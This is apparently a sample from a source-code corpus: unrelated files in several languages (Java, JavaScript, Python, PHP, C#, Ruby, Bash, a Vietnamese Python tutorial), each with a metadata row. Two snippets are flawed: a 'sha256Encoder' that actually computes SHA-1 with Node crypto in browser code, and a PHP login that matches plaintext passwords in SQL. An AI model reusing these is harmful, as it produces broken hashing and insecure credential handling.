public static String JAVA_SERVER_MessageCode = "../../server/mind-server/src/main/java/com/mind/auto/msg/MessageCode.java";
// 0:普通 1:login服务器消息
public static int type = 0;
// public final static String CONFIG_FILE = "/tools.conf";
public static String MESSAGE_FILE = "../../message/message.xml";
public static String JS_MESSAGECODE = "../../client/client_src/message/MessageCode.js";
public static String JS_MESSAGE = "../../client/client_src/message/";
public final static String JAVA_OUT_PATH_TESTHANDLER_CLIENT = "../../server/mind-client/src/main/java/com/mind/test/TestHandler.java";
public static String JAVA_CLIENT_MessageCode = "../../server/mind-client/src/main/java/com/mind/auto/msg/MessageCode.java";
public static String JAVA_CLIENT_MESSAGE = "../../server/mind-client/src/main/java/com/mind/auto/msg/";
//xxx_json.java 文件
// 生成json文件所在目录
public static String js_jsonPath = "./client/client_src/json";
/**
* 客户端全局的json 仓库文件
*/
public static String js_data_file_name="ConfigDataStorage.js";
//生成js文件所在目录
public static String jsPath = "../../client/client_src/auto/";
private final static String ftl_dir = "/ftl";
// public static String JAVA_EXCEL2JSON_DATA_LOGIN = "../../../server/mind-suport/src/main/json/";
// public static String JAVA_EXCEL2JSON_SCHEMAL_LOGIN = "../../../server/mind-suport/src/main/java/com/globalgame/auto/json/";
public static String JAVA_FTL_MESSAGECODE = null;
public static String JAVA_FTL_SERVER = null;
public static String PACKAGE_NAME = "com.mind.auto.msg";
// 生成js text code 文件所在目录
// public static String RESOURCE_JS_TEXTCODE_DIR = "../../../client/client_src/common/BSTextCode.js";
// public static String JS_TEXTCODE_FTL_MESSAGECODE = null;
// public static String RESOURCE_JS_MUSICCODE_DIR = "../../../client/client_src/common/BSMusicCode.js";
// public static String JS_MUSICCODE_FTL_MESSAGECODE = null;
// public static String JAVA_TEXTCODE_FTL_MESSAGECODE = "java_textcode.ftl";
// public static String JAVA_EXCEL_TEXTCODE = "../../../server/mind-suport/src/main/java/com/globalgame/common/TextCodeConstants.java";
// // 资源存放位置
// public static String RESOURCE_GLOBAL_DIR = "../../../design/exls";
// public static int excelType=0;
private Configuration cfg;
private static ToolsConf conf = null;
public static String curPath = null;
private List<DataBigType> bigTypes = new ArrayList<DataBigType>();
private List<DataBaseType> baseTypes = new ArrayList<DataBaseType>();
public static ToolsConf getInstance() {
if (conf == null) {
conf = new ToolsConf();
}
return conf;
}
private void initFtl() {
// 初始化FreeMarker配置;
// - 创建一个配置实例
cfg = new Configuration();
// - 设置模板目录.
cfg.setClassForTemplateLoading(this.getClass(), ftl_dir);
// - 设置模板延迟时间,测试环境设置为0,正是环境可提高数值.
cfg.setTemplateUpdateDelay(0);
// - 设置错误句柄
cfg.setTemplateExceptionHandler(TemplateExceptionHandler.DEBUG_HANDLER);
cfg.setObjectWrapper(ObjectWrapper.BEANS_WRAPPER);
// - 设置默认模板编码
cfg.setDefaultEncoding("utf-8");
// - 设置输出编码
cfg.setOutputEncoding("utf-8");
cfg.setLocale(Locale.SIMPLIFIED_CHINESE);
}
public void init() {
initFtl();
initDataBigTypes();
initDataBaseType();
initFile();
}
public Configuration getCfg() {
return cfg;
}
private void initDataBigTypes() {
String value = "base,0><base array,1><message,2><message array,3";
String[] types = value.split("><");
for (String type : types) {
String[] objs = type.split(",");
DataBigType bigType = new DataBigType(objs[0], Integer.parseInt(objs[1]));
bigTypes.add(bigType);
}
}
private void initFile() {
// initFile(ToolsConf.JAVA_EXCEL2JSON_SCHEMAL,
// ToolsConf.JAVA_SERVER_MESSAGE,
// ToolsConf.JAVA_CLIENT_MESSAGE,
// ToolsConf.JAVA_EXCEL2JSON_DATA,
// ToolsConf.JS_MESSAGE);
//生成消息相关目录
if( file_write_switch_message){
initFile(ToolsConf.JAVA_CLIENT_MESSAGE,ToolsConf.JAVA_SERVER_MESSAGE, ToolsConf.JS_MESSAGE);
}
//服务器开关目录
if(file_write_switch_sever){
initFile(ToolsConf.path_java_server);
initFile(ToolsConf.path_json_server);
}
}
private void initFile(String... filePath){
for(String path:filePath){
File f = new File(path);
if (!f.exists()) {
System.out.println("创建文件夹.." + path);
f.mkdirs();
}
}
}
public int getMessageType() {
return type;
}
public List<DataBigType> getDataBigTypes() {
return bigTypes;
}
private void initDataBaseType() {
String value = "Byte--byte,byte,byte,0><Short--short,short,short,0><Integer--int,int,int,0><Long--long,long,long,0><Float--float,float,float,0><Double--double,double,double,0><String--string,String,string,0><Byte[]--byte*,byte,byte,1><Short[]--short*,short,short,1><Integer[]--int*,int,int,1><Long[]--long*,long,long,1><double[]--double*,double,double,1><String[]--string*,String,string,1";
String[] types = value.split("><");
for (String type : types) {
String[] objs = type.split(",");
int bigType = Integer.parseInt(objs[3]);
DataBaseType baseType = new DataBaseType(objs[0], objs[1], objs[2], getBigTypeByValue(bigType));
baseTypes.add(baseType);
}
}
public DataBigType getBigTypeByValue(int value) {
for (DataBigType bigType : bigTypes) {
if (bigType.getValue() == value) {
return bigType;
}
}
return null;
}
public List<DataBaseType> getDataBaseType() {
return baseTypes;
}
public String getCurPath() {
return curPath;
}
}
|
JavaScript
|
UTF-8
| 650 | 3.15625 | 3 |
[] |
no_license
|
window.onload = () => {
const sha256input_str = document.querySelector("#sha256input");
const sha256btn = document.querySelector("#sha256button");
const sha256output_str = document.querySelector("#sha256output");
function sha256Encoder(input_str){
return crypto.createHash('sha1').update(JSON.stringify(input_str)).digest('hex');
}
sha256btn.addEventListener("click", () => {
if(sha256input_str.value === ""){
window.confirm("You have not provided input string.")
}
sha256output_str.value = sha256Encoder(sha256input_str.value);
console.log(sha256output_str.value);
})
}
|
Java
|
UTF-8
| 545 | 3.203125 | 3 |
[] |
no_license
|
package com.revature.wednesday;
public class Thursday {
public static boolean subString(String str,String str2) {
boolean a=false;
if (str2.length()>str.length()) {
a=false;
}
else {
for(int i=0;i<=(str.length()-str2.length());i++) {
if (str2.equals(str.substring(i, i+str2.length()))) {
a=true;
return true;
}
else {
a=false;
}
}
}
return a;
}
public static int triangle(int rows) {
if(rows==1) {
return 1;
}
return rows+triangle(rows-1);
}
}
|
Java
|
UTF-8
| 429 | 2.4375 | 2 |
[] |
no_license
|
package com.fzy;
import java.awt.*;
/**
* @Author Dayang
* @Date 2021/8/9
* @Version 1.7
*/
public class Rock extends Object{
Rock(){
this.x=(int)(Math.random()*700);
this.y=(int)(Math.random()*550+300);
this.width=71;
this.height=71;
this.flag=false;
this.m =150;
this.count =1;
this.img = Toolkit.getDefaultToolkit().getImage("imgs/rock1.png");
}
}
|
JavaScript
|
UTF-8
| 2,827 | 2.765625 | 3 |
[] |
no_license
|
import * as THREE from "three";
import Stats from "stats.js";
// 統計情報の追加
const stats = initStats();
// シーンの作成
const scene = new THREE.Scene();
// カメラの作成
const camera = new THREE.PerspectiveCamera(
45,
window.innerWidth / window.innerHeight,
0.1,
1000
);
const renderer = new THREE.WebGLRenderer();
renderer.setClearColor(new THREE.Color(0xeeeeee));
renderer.setSize(window.innerWidth, window.innerHeight);
renderer.shadowMap.enabled = true;
// 座標軸
const axes = new THREE.AxesHelper(20);
scene.add(axes);
// plane
const planeGeometry = new THREE.PlaneGeometry(60, 20);
const planeMaterial = new THREE.MeshLambertMaterial({ color: 0xffffff });
const plane = new THREE.Mesh(planeGeometry, planeMaterial);
plane.receiveShadow = true;
plane.rotation.x = -0.5 * Math.PI;
plane.position.x = 15;
plane.position.y = 0;
plane.position.z = 0;
scene.add(plane);
// cube
const cubeGeometry = new THREE.BoxGeometry(4, 4, 4);
const cubeMaterial = new THREE.MeshLambertMaterial({
color: 0xff0000,
});
const cube = new THREE.Mesh(cubeGeometry, cubeMaterial);
cube.castShadow = true;
cube.position.x = -4;
cube.position.y = 3;
cube.position.z = 0;
scene.add(cube);
// sphere
const sphereGeometry = new THREE.SphereGeometry(4, 20, 20);
const sphereMaterial = new THREE.MeshLambertMaterial({
color: 0x7777ff,
});
const sphere = new THREE.Mesh(sphereGeometry, sphereMaterial);
sphere.castShadow = true;
sphere.position.x = 20;
sphere.position.y = 4;
sphere.position.z = 2;
scene.add(sphere);
camera.position.x = -30;
camera.position.y = 40;
camera.position.z = 30;
camera.lookAt(scene.position);
// spotlight
const spotLight = new THREE.SpotLight(0xffffff);
spotLight.position.set(-20, 30, -5);
spotLight.castShadow = true;
scene.add(spotLight);
document.getElementById("WebGL-output").appendChild(renderer.domElement);
var step = 0;
// レンダリング
renderScene();
/**
* シーンのレンダリング(アニメーション)
*/
function renderScene() {
stats.update();
cube.rotation.x += 0.02;
cube.rotation.y += 0.02;
cube.rotation.z += 0.02;
step += 0.04;
sphere.position.x = 20 + 10 * Math.cos(step);
sphere.position.y = 2 + 10 * Math.abs(Math.sin(step));
// requestAnimationFrameを利用してレンダリング(レンダリングタイミングをブラウザに任せる)
requestAnimationFrame(renderScene);
renderer.render(scene, camera);
}
/**
* 統計情報の初期化
* @returns 初期化済みの統計情報コンポーネント
*/
function initStats() {
var stats = new Stats();
stats.setMode(0);
stats.domElement.style.position = "absolute";
stats.domElement.style.left = "0px";
stats.domElement.style.top = "0px";
document.getElementById("Stats-output").appendChild(stats.domElement);
return stats;
}
|
Python
|
UTF-8
| 1,261 | 2.546875 | 3 |
[] |
no_license
|
import numpy
from amuse.lab import *
from amuse.ext.galactics_model import new_galactics_model
M_galaxy = 1.0e12 | units.MSun # Mass of the galaxy
R_galaxy = 10 | units.kpc # Radius of the galaxy
n_halo = 20000 # Number of particles for halo
n_bulge = 10000 # Number of particles for bulge
n_disk = 10000 # Number of particles for disk
# Converter: used to turn n-body system units to the physical units we are interested in
converter=nbody_system.nbody_to_si(M_galaxy, R_galaxy)
galaxy1 = new_galactics_model(n_halo,
converter,
bulge_number_of_particles=n_bulge,
disk_number_of_particles=n_disk)
# rotate function from the galactics_model module
galaxy1.rotate(0., numpy.pi/2, numpy.pi/4)
# Set position and velocity for the galaxy
galaxy1.position += [100.0, 100, 0] | units.kpc
galaxy1.velocity += [-10.0, 0.0, -10.0] | units.km/units.s
# Start SPH code
dynamics = Gadget2(converter, number_of_workers=4)
dynamics.parameters.epsilon_squared = (100 | units.parsec)**2 # Softening length
set1 = dynamics.particles.add_particles(galaxy1)
dynamics.particles.move_to_center()
t_end = 200 | units.Myr
# Evolve galactic model
dynamics.evolve_model(t_end)
|
PHP
|
UTF-8
| 1,781 | 3.09375 | 3 |
[] |
no_license
|
<?php
class User
{
private $db;
/**
* User constructor.
*/
public function __construct()
{
// init database
$this->db = new Database();
}
/*public function findUsersByEmail($email){
$this->db->query('SELECT * FROM employees WHERE email = :email');
$this->db->bind(':email', $email);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// there is an email found
return true;
}else{
return false;
}
}*/
public function findUsersByPseudo($pseudo){
$this->db->query('SELECT * FROM employees WHERE pseudo = :pseudo');
$this->db->bind(':pseudo', $pseudo);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// there is an email found
return true;
}else{
return false;
}
}
/*public function login($email, $password){
$this->db->query('SELECT * FROM employees WHERE email = :email and password = :password');
$this->db->bind(':email', $email);
$this->db->bind(':password', $password);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// user found
return $row;
}else{
return false;
}
}*/
public function login($pseudo, $password){
$this->db->query('SELECT * FROM employees WHERE pseudo = :pseudo and password = :password');
$this->db->bind(':pseudo', $pseudo);
$this->db->bind(':password', $password);
$row = $this->db->single();
if ($this->db->rowCount() > 0){
// user found
return $row;
}else{
return false;
}
}
}
|
Markdown
|
UTF-8
| 4,364 | 4.09375 | 4 |
[] |
no_license
|
# Chương 4: Functions
## Gọi function
Trong chương trình ta có sử dụng rất nhiều function. Để sử dụng một function ta gọi ra tên của function ví dụ như sau:
```
>>> type(32)
<class 'int'>
```
Như ví dụ trên tên của function là `type`. Các ký tự bên trong dấu `()` được gọi là đối số. Đối số có thể là giá trị hoặc biến nó là giá trị input của function.
## Một số hàm có sẵn
max()
min()
len()
**Một số hàm chuyển đôi kiểu dữ liệu**
int()
float()
str()
**Hàm random**
Trước khi sử dụng hàm này ta phải `import` hàm này
Ví dụ có chương trình như sau:
```
import random
x = random.random()
print(x)
```
Khi chạy chương trình này sẽ trả về một số ngầũ nhiên nằm trong khoảng từ 0 đến 1.
`random.randint(5, 10)` câu lệnh này sẽ trả về một số nguyên ngẫu nhiên nằm trong khoảng từ từ `5 -> 10`
Chọn một thành phần bất kỳ trong một chuỗi
```
t = [1, 2, 3]
random.choice(t)
3
```
## Hàm math
Math cung cấp hầu hết các hàm tính toán. Trước khi sử dụng module này ta phải thực hiện import nó.
Để sử dụng một function ta chỉ ra tên của module và sau đó chỉ ra tên của function. Sử dụng dấu chấm để ngăn cách giữa tên module và tên function.
VD:
```
math.sin(0.7)
math.log10(100)
math.sqrt(2)
```
## Tạo một function mới
Chúng ta cũng có thể tự tạo các function. Ví dụ:
```
def print_info():
print("Ho ten: Niemdt")
print("Tuoi: 18")
```
`def` là một keyword để chỉ ra rằng đây là một định nghĩa hàm. `print_info` là tên của function. Quy tắc đặt tên hàm giống với quy tắc đặt tên biến.
Dấu ngoặc sau tên hàm sử dụng để khai báo đối số truyền vào cho hàm. Như ví dụ trên sẽ không có đối số nào được truyền vào cho hàm.
Dòng đầu tiên của hàm dùng để định nghĩa hàm gọi là `header` những dòng sau gọi là `body`-thân hàm. Thông thường thân hàm mỗi dòng lùi vào 4 dấu cách so với bình thường.
Một hàm sẽ thực thi khi hàm này được gọi. Ta có thể gọi một hàm trong một hàm khác. Ví dụ:
```
def repeat_lyrics():
print_info()
print_info()
```
## Tham số và đối số
Một vài function có yêu cầu đối số truyền vào. Một số funciton cần truyền vào nhiều đối số cùng một lúc.
Trong một hàm đối số truyền vào đươc gán cho biến thì nó được gọi là tham số. Ví dụ:
```
def print_twice(bruce):
print(bruce)
print(bruce)
```
## Fruitful function and void functions
Bạn gọi một hàm có giá trị trả về bạn có thể gán trực tiếp nó cho một biến để sử dụng. Nếu bạn gọi một hàm ở mode tương tác nó sẽ trả kết quả ra màn hình
```
>>> math.sqrt(5)
2.23606797749979
```
Nhưng nếu bạn đặt nó trong một script mà bạn không gán nó cho biến thì bạn sẽ không thấy đươc giá trị của nó.
Nếu hàm không có giá trị return mà bạn cố gán nó cho một biến thì biến này sẽ nhận một giá trị đặc biệt là `None`
```
>>> result = print_twice('Bing')
Bing
Bing
>>> print(result)
None
```
Để trả về một giá trị bạn sử dụng câu lệnh `return` trong function của bạn.
```
def addtwo(a, b):
added = a + b
return added
x = addtwo(3, 5)
print(x)
```
Khi chạy chương trình thì chương trình sẽ in ra màn hình giá trị là `8`.
## Tại sao cần function
Có một vài lý do tại sao nên chia nhỏ chương trình thành các hàm:
* Giúp bạn dễ đọc, hiểu và debug.
* Có thể giúp chương trình của bạn ngắn hơn do loại bỏ được các đoạn code lặp. Nếu bạn muốn thay đổi code bạn chỉ cần sửa tại function.
* Chia chương trình thành các hàm khi bị lỗi bạn có thể kiêm tra từng hàm và biết chính xác đang bị lỗi ở đâu và dễ dàng chỉnh sửa.
* Nếu hàm của bạn tốt và không có lỗi bạn có thể sử dung nó cho nhiều chương trình.
|
Java
|
UTF-8
| 3,899 | 2.375 | 2 |
[] |
no_license
|
package protese.dao.servico;
import java.util.ArrayList;
import java.util.List;
import javax.persistence.Query;
import protese.dao.cliente.ClienteDebitoDao;
import protese.jpa.interfaces.Dao;
import protese.model.cliente.Cliente;
import protese.model.cliente.ClienteDebito;
import protese.model.servico.Servico;
import protese.model.servico.ServicoDebito;
/**
*
* @author Vinicius Silveira
*/
public class ServicoDebitoDao extends Dao<ServicoDebito> {
private static ServicoDebitoDao unique = null;
private ClienteDebitoDao clienteDebitoDao = ClienteDebitoDao.getInstance();
private ServicoDebitoDao() {
}
public static ServicoDebitoDao getInstance() {
if (unique == null) {
unique = new ServicoDebitoDao();
}
return unique;
}
public ServicoDebito salvar(ServicoDebito servicoDebito) {
try {
servicoDebito = super.gravar(servicoDebito);
} catch (Exception e) {
}
return servicoDebito;
}
public ServicoDebito deletar(ServicoDebito servicoDebito) {
try {
servicoDebito.setExcluido(true);
servicoDebito = salvar(servicoDebito);
} catch (Exception e) {
}
return servicoDebito;
}
public List<ServicoDebito> retornaTodosAtivosPorCliente(Cliente cliente) {
List<ServicoDebito> resultset = new ArrayList();
Query query = createQuery("SELECT servicoDebito FROM ServicoDebito AS servicoDebito "
+ " INNER JOIN servicoDebito.idclienteDebito AS clienteDebito "
+ " INNER JOIN servicoDebito.idservico AS servico "
+ " WHERE servicoDebito.excluido = false "
+ " AND servico.excluido = false "
+ " AND clienteDebito.excluido = false "
+ " AND servico.dataFinalizacao IS NULL "
+ " AND servico.idcliente = :cliente "
+ " ORDER BY clienteDebito.data DESC");
query.setParameter("cliente", cliente);
resultset = query.getResultList();
return resultset;
}
public ServicoDebito salvarServicoDebito(ClienteDebito clienteDebito, Servico servico) {
ServicoDebito servicoDebito = new ServicoDebito();
servicoDebito.setIdservico(servico);
servicoDebito.setIdclienteDebito(clienteDebito);
return salvar(servicoDebito);
}
public boolean verificaAgregarDebitos(Servico servico) {
List<ClienteDebito> clienteDebitoList = clienteDebitoDao.retornaTodosNaoUtilizadosPorCliente(servico.getIdcliente());
for (ClienteDebito debito : clienteDebitoList) {
ServicoDebito servicoDebito = new ServicoDebito();
servicoDebito.setIdservico(servico);
servicoDebito.setIdclienteDebito(debito);
salvar(servicoDebito);
}
return !clienteDebitoList.isEmpty();
}
public List<ServicoDebito> retornaTodosPorServico(Servico servico) {
List<ServicoDebito> resultset = new ArrayList();
Query query = createQuery("SELECT servicoDebito FROM ServicoDebito AS servicoDebito "
+ " INNER JOIN servicoDebito.idclienteDebito AS clienteDebito "
+ " INNER JOIN servicoDebito.idservico AS servico "
+ " WHERE servicoDebito.excluido = false "
+ " AND servico.excluido = false "
+ " AND clienteDebito.excluido = false "
+ " AND servicoDebito.idservico = :servico "
+ " ORDER BY clienteDebito.data DESC");
query.setParameter("servico", servico);
resultset = query.getResultList();
return resultset;
}
}
|
C#
|
UTF-8
| 2,192 | 3.375 | 3 |
[] |
no_license
|
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace lab8t1
{
class TTriangle
{
public double AB;
public double AC;
public double BC;
public double k;
TTriangle()
{
this.AB = 0;
this.AC = 0;
this.BC = 0;
}
public TTriangle(double AB, double AC, double BC)
{
this.AB = AB;
this.AC = AC;
this.BC = BC;
}
public TTriangle(TTriangle text)
{
this.AB = text.AB;
this.AC = text.AC;
this.BC = text.BC;
}
public double perimeterTriangle()
{
double P = AB + BC + AC;
return P;
}
public double areaTriangle()
{
double p = perimeterTriangle() / 2;
double S = Math.Sqrt(p * (p - AB) * (p - AC) * (p - BC));
return S;
}
public string seedsTriangle()
{
return $"AB: {AB}, AC:{AC}, BC:{BC}";
}
public string comparisonTriangle(TTriangle otherTriangle)
{
if (perimeterTriangle() == otherTriangle.perimeterTriangle())
{
return "Трикутники рівні";
}
else
{
return "Трикутники не рівні";
}
}
public static TTriangle operator + ( TTriangle triangle,TTriangle randTriangle)
{
return new TTriangle(triangle.AB + randTriangle.AB,triangle.AC+randTriangle.AC,
triangle.BC+randTriangle.BC);
}
public static TTriangle operator -(TTriangle triangle, TTriangle randTriangle)
{
return new TTriangle(triangle.AB - randTriangle.AB, triangle.AC - randTriangle.AC,
triangle.BC - randTriangle.BC);
}
public static TTriangle operator *(TTriangle triangle, double k)
{
return new TTriangle(triangle.AB * k, triangle.AC * k,
triangle.BC * k);
}
}
}
|
Java
|
UTF-8
| 275 | 2.140625 | 2 |
[] |
no_license
|
package com.lsheep.common.core.utils;
public abstract class StringUtils extends org.springframework.util.StringUtils {
public static String captureName(String name) {
char[] character = name.toCharArray();
character[0] -= 32;
return String.valueOf(character);
}
}
|
Ruby
|
GB18030
| 1,496 | 2.609375 | 3 |
[] |
no_license
|
require 'socket'
##############################ѭִһtcpỰͻֹͣ
# A simple TCP server may look like:
# server_ip = "50.50.50.55"
# port = 2000
# server = TCPServer.new server_ip, port # Server bind to port 2000
# client = server.accept # Wait for a client to connect
# client.puts "Hello !"
# client.puts "Time is #{Time.now}"
# client.close
##############################ѭ¿Խܵû
# server_ip = "50.50.50.55"
# port = 2000
# server = TCPServer.new server_ip, port # Server bind to port 2000
# loop do
# client = server.accept # Wait for a client to connect
# client.puts "Hello !"
# client.puts "Time is #{Time.now}"
# client.close
# end
##############################ѭ¿Խܵû
server_ip = "50.50.50.55"
port = 2001
server = TCPServer.new server_ip, port # Server bind to port 2000
t = Thread.new(server) do |server|
loop do
client = server.accept # Wait for a client to connect
client.puts "Hello !"
client.puts "Time is #{Time.now}"
client.close
end
end
t.join
#######################ͻ
# server_ip = "50.50.50.55"
# port = 2000
# server = TCPServer.new server_ip, port # Server bind to port 2000
# loop do
# Thread.new(server) do |server|
# client = server.accept # Wait for a client to connect
# client.puts "Hello !"
# client.puts "Time is #{Time.now}"
# client.close
# end
# end
|
Java
|
UTF-8
| 4,507 | 2.46875 | 2 |
[] |
no_license
|
package cn.newgxu.bbs.web.servlet;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import cn.newgxu.bbs.common.util.Util;
import cn.newgxu.bbs.service.UserService;
/**
*
* @author hjc
* @since 4.0.0
* @version $Revision 1.1$
*/
@SuppressWarnings("serial")
public class AjaxHandlerServlet extends HttpServlet {
private UserService userService = (UserService) Util.getBean("userService");
public void execute(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
String path = request.getServletPath();
path = path.substring(0, path.lastIndexOf("."));
String handler = getHandlerMapping().get(path);
if (handler == null) {
response.sendError(HttpServletResponse.SC_NOT_FOUND,
"Unknown path:" + path);
return;
}
try {
response.setHeader("Cache-Control", "no-cache");
Class<?>[] parameterTypes = new Class[] { HttpServletRequest.class,
HttpServletResponse.class };
Method method = this.getClass().getDeclaredMethod(handler,
parameterTypes);
method.invoke(this, request, response);
} catch (Exception e) {
e.printStackTrace();
throw new ServletException(e);
}
}
protected Map<String, String> getHandlerMapping() {
Map<String, String> handlers = new HashMap<String, String>();
handlers.put("/accounts/validateNickName", "validateNickName");
handlers.put("/accounts/validateLoginName", "validateLoginName");
handlers.put("/request/get", "handleGetParameters");
handlers.put("/request/post", "handlePostParameters");
return handlers;
}
protected void validateLoginName(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/plain");
PrintWriter out = response.getWriter();
String userName = request.getParameter("userName");
boolean exist = false;
try {
exist = userService.isUserNameInUser(userName);
} catch (Exception e) {
e.printStackTrace();
// throw new ServletException(e);
}
if (exist) {
out.print("inuse");
} else {
out.print("good name");
}
out.close();
}
protected void validateNickName(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/plain");
PrintWriter out = response.getWriter();
String nick = request.getParameter("nick");
boolean exist = false;
try {
exist = userService.isNickNameInUser(nick);
} catch (Exception e) {
e.printStackTrace();
out.print("good name");
out.close();
}
if (exist) {
out.print("inuse");
} else {
out.print("good name");
}
out.close();
}
protected void handleGetParameters(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/html;charset=gbk");
PrintWriter out = response.getWriter();
String name = request.getParameter("name");
String gender = request.getParameter("gender");
String greetings = "尊敬的" + name;
if (gender.equals("m")) {
greetings += "先生";
} else {
greetings += "女士";
}
out.print(greetings);
out.print(",您好!");
out.close();
}
protected void handlePostParameters(HttpServletRequest request,
HttpServletResponse response) throws IOException {
response.setContentType("text/html;charset=gbk");
PrintWriter out = response.getWriter();
request.setCharacterEncoding("utf-8");
String name = request.getParameter("name");
String gender = request.getParameter("gender");
String greetings = "尊敬的" + name;
if (gender.equals("m")) {
greetings += "先生";
} else {
greetings += "女士";
}
out.print(greetings);
out.print(",您好!");
out.close();
}
public void setUserService(UserService userService) {
this.userService = userService;
}
public void doGet(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
execute(request, response);
}
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
execute(request, response);
}
}
|
Java
|
UTF-8
| 1,571 | 2.953125 | 3 |
[] |
no_license
|
package phase1.module4.Work.work03.server;
import phase1.module4.Work.ServerThread;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.*;
public class Server {
public static Map<String,Socket> sockets = new HashMap<>();
public static void main(String[] args) {
ServerSocket ss = null;
Socket s = null;
BufferedReader br = null;
try {
ss = new ServerSocket(6666);
while (true) {
System.out.println("等待客户端的请求连接...");
s = ss.accept();
br = new BufferedReader(new InputStreamReader(s.getInputStream()));
String name = br.readLine();
if( name.contains("^&*)8947!@!")){
sockets.put(name.substring("^&*)8947!@!".length()),s);
}
System.out.println(name + "连接成功!");
new Thread(new ServerRunnable(s)).start();
}
} catch (IOException e) {
e.printStackTrace();
} finally {
if(null != s){
try {
s.close();
} catch (IOException e) {
e.printStackTrace();
}
}
if(null != ss){
try {
ss.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}
}
}
|
C++
|
GB18030
| 268 | 3.25 | 3 |
[] |
no_license
|
#pragma once
template <typename T>
void Vector<T> ::copyFrom(T const* A,Rank lo, Rank hi){
// 2¿ռ
_elem = new T[_capacity = 2 * (hi - lo)];
// ģ
_size = 0;
// һԪ
while(lo<hi){
_elem[_size++] = A[lo++];
}
}
|
Shell
|
UTF-8
| 1,026 | 3.546875 | 4 |
[] |
no_license
|
#!/bin/bash
#This script runs a snoutscan benchmark on the data at $1 using different indicies and prints a
# tsv-like output with the resuling accuracy and time
# set -x
dataDir="$1"
#This is a list of strings that fully define a faiss index:
indexDefinitions=( "Flat"
"IVF1024,Flat"
"IVF2048,Flat"
"IVF4096,Flat"
"PQ32"
"PCA80,Flat"
"IVF4096,PQ8+16"
"IVF4096,PQ32"
"IMI2x8,PQ32"
"IMI2x8,PQ8+16"
"OPQ16_64,IMI2x8,PQ8+16")
echo -e "indexDefinition\taccuracy\truntimeSec"
for index in ${indexDefinitions[*]}
do
timeBeforeSec=$(date +"%s")
accuracy=$(snoutScan.py -i "$index" "$dataDir" 2>/dev/null | grep 'Proportion of subject' | sed 's/.*: //g')
timeAfterSec=$(date +"%s")
timeBetweenSec=$( echo "$timeAfterSec - $timeBeforeSec" | bc )
echo -e "$index\t$accuracy\t$timeBetweenSec"
done
|
Ruby
|
UTF-8
| 230 | 2.625 | 3 |
[] |
no_license
|
require "fileutils"
include FileUtils::Verbose
def run(a, *b, **c)
pp [a, b, c]
end
run 10
run 10, 20
run 10, 20, 30, 40
run 10, 20, 30, 40, [50, 60]
run 10, 20, 30, 40, name: "akshay", age: 29
run 10, name: "akshay", age: 29
|
JavaScript
|
UTF-8
| 1,008 | 3.34375 | 3 |
[] |
no_license
|
// your code here!
var normalizeText = function(text){
return text.toLowerCase().trim();
}
var tokenizer = function(text){
return text.replace('/\r?\n|\r/','').split(' ');
}
var countAvgWordLength = function(token){
var str = token.join("");
return (str.length/token.length).toFixed(2);
}
var uniqueWordCount = function(token){
var match = [];
for(var i = 0; i < token.length; i++){
if(match.indexOf(token[i]) === -1){
match.push(token[i]);
}
}
return match.length
}
var renderResults = function(text){
var tokens = tokenizer(normalizeText(text));
$('.hidden').removeClass();
$('dl').find('.js-word-count').text(tokens.length);
$('dl').find('.js-unique-word').text(uniqueWordCount(tokens));
$('dl').find('.js-avg-length').text(countAvgWordLength(tokens));
}
var getSubmit = function(){
$('#user-text').submit(function(event){
event.preventDefault();
var str = $('.js-user-text').val();
console.log(str);
renderResults(str);
})
}
$(function(){
getSubmit();
})
|
C#
|
UTF-8
| 1,774 | 2.578125 | 3 |
[] |
no_license
|
using System;
using System.IO;
using System.Text.Json;
namespace Overstag.Core
{
public class Credentials
{
public string mailUsername { get; set; }
public string mailPass { get; set; }
public string mySqlConnectionString { get; set; }
public string msSqlConnectionString { get; set; }
public string msSqlLiveCString { get; set; }
public string mySqlLiveCString { get; set; }
public string mollieApiToken { get; set; }
public string msSqlDebugCString { get; set; }
/// <summary>
/// Get credentials from file on server
/// </summary>
/// <returns>Credentials object</returns>
public Credentials Get()
{
Console.WriteLine("[LOG] Reading credentials from file...");
return JsonSerializer.Deserialize<Credentials>(File.ReadAllText(Path.Combine(Environment.CurrentDirectory, "credentials.json")));
}
}
public static class General
{
public static bool isDebug { get { return IsDebug(); } }
private static Credentials _credentials;
public static Credentials Credentials {
get {
if (_credentials == null)
_credentials = new Credentials().Get();
return _credentials;
}
}
public static bool DateIsPassed(DateTime check)
=> check < DateTime.Now;
public static int getAge(DateTime bd)
=> (new DateTime(DateTime.Now.Year, bd.Month, bd.Day) > DateTime.Now ? (DateTime.Now.Year - bd.Year)-1 : (DateTime.Now.Year - bd.Year));
private static bool IsDebug()
{
#if DEBUG
return true;
#else
return false;
#endif
}
}
}
|
PHP
|
UTF-8
| 2,707 | 2.84375 | 3 |
[
"AGPL-3.0-only",
"MIT",
"LGPL-2.0-or-later",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"GPL-3.0-only"
] |
permissive
|
<?php
declare(strict_types=1);
/*
* The MIT License (MIT)
*
* Copyright (c) 2018 Spomky-Labs
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
namespace CBOR\OtherObject;
use Assert\Assertion;
use CBOR\OtherObject as Base;
use InvalidArgumentException;
final class DoublePrecisionFloatObject extends Base
{
public static function supportedAdditionalInformation(): array
{
return [27];
}
public static function createFromLoadedData(int $additionalInformation, ?string $data): Base
{
return new self($additionalInformation, $data);
}
/**
